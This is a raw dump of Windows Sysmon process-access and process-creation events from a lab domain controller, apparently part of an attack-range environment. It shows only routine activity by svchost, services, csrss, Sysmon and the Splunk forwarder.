13:34:15.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.423{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.423{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.423{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.423{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.423{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.423{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.423{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.423{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.423{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.409{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.409{59A5CD1D-8E44-6005-0A00-00000000A301}8482664C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+3332|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.853{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" serviceC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
